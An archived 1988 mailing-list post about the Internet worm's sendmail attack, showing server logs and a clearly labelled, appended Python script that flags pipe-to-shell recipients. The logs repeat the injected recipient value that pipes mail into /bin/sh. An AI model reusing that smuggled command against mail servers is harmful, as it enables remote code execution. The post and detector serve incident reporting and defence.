Virus posting #2


Steven M. Schultz (sms@ETN-WLV.EATON.COM)
Thu, 3 Nov 88 08:57:19 PST


> From: Peter E. Yee <yee@ames.arc.nasa.gov>
> Message-Id: <8811030728.AA18199@ames.arc.nasa.gov>
> Subject: Internet VIRUS alert
>
> We are currently under attack from an Internet VIRUS. It has hit UC Berkeley,
> UC San Diego, Lawrence Livermore, Stanford, and NASA Ames. The virus comes in
> via SMTP, and then is able to attack all 4.3BSD and SUN (3.X?) machines. It
> sends a RCPT TO that requests that its data be piped through a shell.
> ...
> -Peter Yee
> yee@ames.arc.nasa.gov
> ames!yee

        Before turning off various services I logged attempts from
        these addresses:

                128.15.0.76
                26.7.0.102
                128.49.16.91
                and
                128.9.1.2

        I am still seeing SMTP attempts from 26.7.0.102; the lines in
        the sendmail logfile look like this:

Nov 3 08:26:28 from=</dev/null>, size=1676, class=0
Nov 3 08:26:35 to=<"| sed '1,/^$/d' | /bin/sh ; exit 0">, delay=00:00:19,
Nov 3 08:46:37 from: 26.7.0.102.49412
Nov 3 08:46:57 message-id=<8811031646.AA02609@ETN-WLV.EATON.COM>
Nov 3 08:46:57 from=</dev/null>, size=1677, class=0
Nov 3 08:47:04 to=<"| sed '1,/^$/d' | /bin/sh ; exit 0">, delay=00:00:23,
Nov 3 08:50:46 from: 26.0.0.58.49924
Nov 3 08:51:02 message-id=<8811031650.AA02625@ETN-WLV.EATON.COM>
Nov 3 08:51:02 from=</dev/null>, size=1675,
Nov 3 08:51:08 to=<"| sed '1,/^$/d' | /bin/sh ; exit 0">, delay=00:00:19,

        Hmmm, there's a new one here - 26.0.0.58. Hadn't seen that one yet.

        Steven M. Schultz
        sms@etn-wlv.eaton.com
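
Added example (not part of the original post, and not code from its author): a Python scan for the pattern visible in the log excerpt above, a recipient that is a pipe into a command, attributed to the most recent connecting address. The sample lines and their addresses are constructed, and reading the trailing number on "from:" lines as the peer's port is an assumption.

```python
import re

# Line shapes follow the sendmail log excerpt in the post. Treating the
# trailing number on "from:" lines as the peer's port is an assumption.
CONN_RE = re.compile(r"\bfrom: (\d+\.\d+\.\d+\.\d+)\.(\d+)\s*$")
FROM_RE = re.compile(r"\bfrom=<([^>]*)>")
TO_RE = re.compile(r"\bto=<(.*)>")   # greedy: a piped command may contain '>'

# Constructed sample (documentation addresses), not lines from a real log.
SAMPLE = """\
Nov 3 09:00:01 from: 192.0.2.10.40001
Nov 3 09:00:05 message-id=<0001@mail.example.org>
Nov 3 09:00:05 from=</dev/null>, size=1677, class=0
Nov 3 09:00:12 to=<"| sed '1,/^$/d' | /bin/sh ; exit 0">, delay=00:00:11,
Nov 3 09:05:00 from: 192.0.2.20.40002
Nov 3 09:05:02 from=<alice@example.org>, size=512, class=0
Nov 3 09:05:03 to=<bob@example.org>, delay=00:00:03,
""".splitlines()


def is_pipe_recipient(addr):
    """True when the recipient is a command pipe rather than a mailbox."""
    return addr.strip().lstrip('"').lstrip().startswith("|")


def scan(lines):
    """Return one finding per pipe recipient, tagged with the last peer seen."""
    peer = sender = None
    findings = []
    for line in lines:
        if m := CONN_RE.search(line):
            peer, sender = m.group(1), None   # new connection resets sender
        elif m := FROM_RE.search(line):
            sender = m.group(1)
        elif (m := TO_RE.search(line)) and is_pipe_recipient(m.group(1)):
            findings.append({
                "time": " ".join(line.split()[:3]),
                "peer": peer,            # None if no "from:" line preceded
                "sender": sender,
                "recipient": m.group(1),
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f"{f['time']} peer={f['peer']} sender={f['sender']} rcpt={f['recipient']}")
```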



This archive was generated by hypermail 2.0b3 on Thu Mar 09 2000 - 14:43:58 GMT